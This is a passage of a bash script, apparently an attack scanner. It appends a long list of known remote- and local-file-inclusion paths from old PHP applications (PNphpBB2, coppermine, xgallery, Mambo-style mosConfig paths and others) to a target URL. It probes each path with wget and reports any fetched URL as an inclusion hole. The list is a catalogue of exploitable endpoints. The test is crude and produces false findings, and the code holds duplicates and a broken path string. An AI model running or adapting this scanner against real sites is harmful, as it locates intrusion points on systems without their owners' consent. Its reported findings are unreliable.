echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ihm.php?p="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=""
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/4nAlbum/public/displayCategory.php?basepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/coppermine/themes/default/theme.php?THEME_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/My_eGallery/public/displayCategory.php?basepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?file="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?view="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?z="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?body="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?babInstallPath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index1.php?main="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index2.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?TWC="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?sec="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?TWC="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/includes/header.php?systempath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Gallery/displayCategory.php?basepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.inc.php?PATH_Includes="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ashnews.php?pathtoashnews="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ashheadlines.php?pathtoashnews="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/demo/includes/init.php?user_inc="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/jaf/index.php?show="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/inc/shows.inc.php?cutepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/poll/admin/common.inc.php?base_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pollvote/pollvote.php?pollname="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sources/post.php?fil_config="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/My_eGallery/public/displayCategory.php?basepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/bb_lib/checkdb.inc.php?libpach="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/include/livre_include.php?no_connect=lol&chem_absolu="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?from_market=Y&pageurl="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/mod_mainmenu.php?mosConfig_absolute_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pivot/modules/module_db.php?pivot_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/4nAlbum/public/displayCategory.php?basepath="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/derniers_commentaires.php?rep="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/coppermine/themes/default/theme.php?THEME_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/coppermine/include/init.inc.php?CPG_M_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/coppermine/themes/coppercop/theme.php?THEME_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/coppermine/themes/maze/theme.php?THEME_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/myPHPCalendar/admin.php?cal_dir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/agendax/addevent.inc.php?agendax_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/mod_mainmenu.php?mosConfig_absolute_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/default.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?action="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index1.php?p="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index2.php?x="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index2.php?content="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=""
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?conteudo="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?cat="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/include/new-visitor.inc.php?lvc_include_dir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/agendax/addevent.inc.php?agendax_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/shoutbox/expanded.php?conf="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pivot/modules/module_db.php?pivot_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/library/editor/editor.php?root="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="
/library/lib.php?root="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/e107/e107_handlers/secure_img_render.php?p="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/zentrack/index.php?configFile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?x="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/becommunity/community/index.php?pageurl="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/GradeMap/index.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index4.php?body="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/side/index.php?side="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/es/index.php?action="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?sec="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?main="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?sec="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?menu="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/html/page.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/page.php?view="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?menu="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?view="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/content.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?x="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main_site.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?L2="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/content.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.php?x="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main_site.php?page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > remote file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/act="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acion="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/action="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/API_HOME_DIR="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/board="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cat="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/client_id="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cmd="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cont="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/current_frame="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/date="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/detail="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/dir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/display="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/download="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/f="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/file="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fileinclude="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/filename="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/firm_id="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
